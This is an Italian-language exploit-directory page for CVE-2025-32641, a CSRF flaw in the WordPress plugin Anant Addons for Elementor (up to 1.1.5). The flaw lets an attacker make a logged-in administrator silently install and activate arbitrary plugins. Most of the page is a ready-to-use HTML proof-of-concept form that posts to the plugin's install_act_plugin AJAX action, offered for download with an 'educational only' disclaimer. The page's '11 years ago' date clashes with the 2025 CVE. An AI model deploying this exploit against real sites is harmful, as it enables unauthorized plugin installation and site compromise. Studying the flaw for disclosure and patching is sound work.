Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/nxploited/cve-2025-32641
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPaper e RicercaApprendimento e Formazione
GitHubnxploited/cve-2025-32641

CVE-2025-32641

Anant Addons for Elementor <= 1.1.5 vulnerabilità di CSRF per installazione arbitraria di plugin

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🛡️ Anant Addons per Elementor <= 1.1.5 - CSRF verso Installazione Arbitraria di Plugin

🧨 CVE-2025-32641

Vulnerabilità di Cross-Site Request Forgery (CSRF) in anantaddons' Anant Addons per Elementor
Questo problema interessa le versioni: da sconosciuta fino alla 1.1.5

  • Punteggio Base: 9.6 (CRITICO)
  • Vettore CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

🔍 Descrizione

Questa vulnerabilità consente a attaccanti non autenticati di eseguire l'installazione arbitraria di plugin per conto di un amministratore connesso, a sua insaputa.
Costruendo una pagina o un modulo malevolo, l'attaccante può forzare silenziosamente l'amministratore a installare e attivare qualsiasi plugin dal repository di WordPress.


💥 Impatto

  • ✅ Installazione arbitraria di plugin
  • ✅ Attivazione del plugin
  • ❌ Nessuna protezione nonce o CSRF
  • ✅ Sfruttabile tramite una semplice pagina HTML
  • ⚠️ Richiede che l'amministratore sia connesso e apra la pagina malevola

🧪 Proof of Concept in HTML

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Anant Addons for Elementor <= 1.1.5 CSRF Exploit</title>
  <style>
    body {
      background-color: #111;
      color: #0f0;
      font-family: monospace;
      padding: 40px;
    }
    h1 {
      color: #ff0055;
      font-size: 24px;
      border-bottom: 1px solid #555;
      padding-bottom: 10px;
    }
    .box {
      background-color: #222;
      border: 1px solid #444;
      padding: 20px;
      margin-top: 20px;
    }
    input[type="submit"] {
      background-color: #ff0055;
      color: #fff;
      border: none;
      padding: 10px 20px;
      font-weight: bold;
      cursor: pointer;
    }
    input[type="submit"]:hover {
      background-color: #cc0044;
    }
  </style>
</head>
<body>

  <h1>
    Anant Addons for Elementor <= 1.1.5<br>
    CSRF to Arbitrary Plugin Installation Vulnerability
  </h1>

  <div class="box">
    <p># By: <strong>Nxploited | Khaled Alenazi</strong></p>
    <p># Type: <strong>CSRF (No Nonce Validation)</strong></p>
    <p># Impact: <strong>Unauthenticated attacker can force admin to install and activate arbitrary WordPress plugins</strong></p>
  </div>

  <form action="http://192.168.100.74:888/wordpress/wp-admin/admin-ajax.php?action=install_act_plugin" method="POST" class="box">
    <input type="hidden" name="plugs" value="hello-dolly">
    <p>🎯 Click the button below to trigger plugin installation (admin session must be active):</p>
    <input type="submit" value="Exploit Now">
  </form>

</body>
</html>


🎯 Quando un amministratore connesso clicca su questo modulo (o si invia automaticamente in una pagina malevola), il plugin verrà silenziosamente installato e attivato.


⚠️ Disclaimer

Questo repository e i suoi contenuti sono solo a scopo educativo e di ricerca sulla sicurezza.
L'autore non è responsabile per qualsiasi uso improprio o danno causato dall'uso improprio di queste informazioni.
Esegui sempre i test su sistemi di tua proprietà o per cui hai esplicita autorizzazione.


da: Nxploited | Khaled ALenazi

Scarica lo strumento